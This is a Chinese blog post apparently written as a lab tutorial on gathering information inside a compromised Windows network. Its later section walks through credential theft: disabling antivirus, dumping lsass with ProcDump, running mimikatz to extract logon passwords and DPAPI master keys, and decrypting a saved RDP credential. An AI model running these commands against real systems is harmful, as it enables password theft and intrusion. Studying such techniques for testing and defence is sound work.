【内网渗透】内网信息收集的十三种基本方式

于 2024-09-06 09:23:46 发布
阅读量1k 收藏 18
点赞数 29
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xt350488/article/details/141950688
版权

本文的主题为基本的信息收集方式,不包含域内信息收集,域内信息收集得再过几天看看,用的windows server 2019内核版本比较高,还有一些信息收集技巧行不通,比如检查杀毒软件情况,就不举例了

一些工具准备
mimikatz:https://github.com/ParrotSec/mimikatz
​
ProcDump:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump
当前用户信息

查看当前用户信息,RID,组信息,特权信息

whoami /all

image-20240905101003965

image-20240905101020438

image-20240905101033968

系统信息
systeminfo

image-20240905142138399

网络及端口状态
netstat -an

这里,-a 表示显示所有连接和监听端口,-n 表示以数字形式显示地址和端口号。

image-20240905143044809

LISTENING:表示监听中,这个端口正在开放,可以提供服务

SYN_SENT:客户端已经发送连接请求(SYN),并正在等待服务器的确认(SYN-ACK报文)。这是TCP三次握手过程中的一个状态。

CLOSED:连接已关闭,不再存在。

TIME_WAIT:连接已关闭,但TCP协议规定在这段时间内(通常是2倍的最大报文存活时间,即2MSL)不能立即使用该连接相同的四元组(源IP、源端口、目标IP、目标端口)建立新的连接,以防止旧连接的残留数据干扰新连接。【MSL,报文最大生存时间可能是30秒、1分钟或2分钟,取决于操作系统】

ESTABLISHED:连接已成功建立,数据可以在客户端和服务器之间双向传输。比如HTTP/HTTPS,FTP,SMTP,SSH,MYSQL,RDP(windows远程桌面服务)等

当前主机名称
hostname

image-20240905145123833

当前操作系统
wmic OS

image-20240905145455078

这么不好看?就使用get命令对每一列进行筛选,赛选常用的信息

image-20240905145635717

wmic OS get Caption,CSDVersion,OSArchitecture,Version

image-20240905145906782

安装的应用程序
wmic product get name,version

image-20240905154110362

在线用户
quser

image-20240905154228123

网络配置
ipconfig /all

image-20240905154307635

查看进程
tasklist /v

image-20240905161009326

查看当前登录域
net config workstation

image-20240905161459979

远程桌面连接历史记录

有的话就有,可以把凭证取下来进行本地解密、没有的话会显示无

cmdkey /list

image-20240905161920815

以下是解密过程(失败了)参考的:https://www.cnblogs.com/websecyw/p/12842741.html

查看是否存在凭证,记录好这个红色框值,和目录进行拼接

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
# 拼接后的文件路径待会要用
C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

image-20240905181423506

lsass.dmp文件默认情况下并不能直接复制,所以要用到procdump工具打包凭证信息(本文演示的为没有杀毒的操作,记得先关闭杀毒软件,不然会拒绝访问)

procdump.exe -accepteula -ma lsass.exe lsass.dmp

image-20240905164311440

把这个目录下得lsass.dmp复制到mimikatz目录下

copy lsass.dmp C:\Users\Administrator\Desktop\mimikatz\mimikatz

image-20240905175840747

使用工具mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

image-20240905180631025

记录好guidMasterKey,为{a77cdf8b-ca6e-4a91-a406-d1ab7105712e}

image-20240905184525397

获取对应得MasterKey

sekurlsa::dpapi

image-20240905181115959

找到之前所对应得guid得到masterkey,使用Masterkey解密凭证得到明文密码

dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:fcffc5d85122c8bb31d33e927009e0c939b65a1d335565e7c5e12fd17555b625ad6a6fc03244dad05c0f026d1e425fcb5d8dc77bd4c6205d847e7526e6b2f38b

确保你的系统没有打补丁(也许不是补丁,我用的winserver2019),不然就解密失败,这里我的失败了,下次再试试

本机用户
net user

image-20240905190433411

某用户的X信息
net user 用户名

image-20240905190607174

往期推荐

【JS逆向】某大型音乐平台JS逆向分析

【流量分析】Java框架Shiro、工具利用、漏洞复现以及流量特征分析

【渗透测试】12种rbash逃逸方式总结

最新可用,bp+charles小程序抓包教程

DocCMS 网站存在SQL注入漏洞

泷羽Sec
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

泷羽Sec

公众号【小羽网安】

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值